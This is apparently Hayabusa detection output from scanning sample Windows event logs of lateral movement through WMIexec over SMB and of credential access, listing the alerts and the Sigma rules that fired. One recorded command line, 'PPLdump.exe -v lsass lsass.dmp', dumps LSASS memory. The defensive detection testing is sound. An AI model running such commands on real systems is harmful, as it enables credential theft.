via SMB.evtx -2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PPLdump.exe -v lsass lsass.dmp : Path: C:\Users\IEUser\Desktop\PPLdump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PPLdump.exe -v lsass lsass.dmp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx -2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47020 : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34114 : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" -2021-04-26 17:25:38.420 